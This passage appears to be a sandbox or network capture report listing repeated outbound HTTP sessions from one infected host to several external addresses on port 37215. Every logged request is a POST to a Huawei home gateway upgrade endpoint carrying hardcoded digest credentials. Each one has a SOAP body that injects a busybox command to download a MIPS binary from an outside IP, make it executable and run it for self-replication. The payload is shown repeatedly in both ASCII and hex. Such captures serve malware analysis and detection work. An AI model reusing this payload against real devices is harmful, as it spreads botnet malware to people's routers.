                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.529509068 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    41192.168.2.1436708101.129.97.5137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.119267941 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.469392061 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    42192.168.2.144994841.235.118.4937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.119267941 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.469392061 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    43192.168.2.1448604125.39.64.17237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.120281935 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.544485092 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    44192.168.2.144085646.221.220.19537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.120281935 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.544485092 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    45192.168.2.1438798157.212.168.3337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.121413946 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.500138998 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
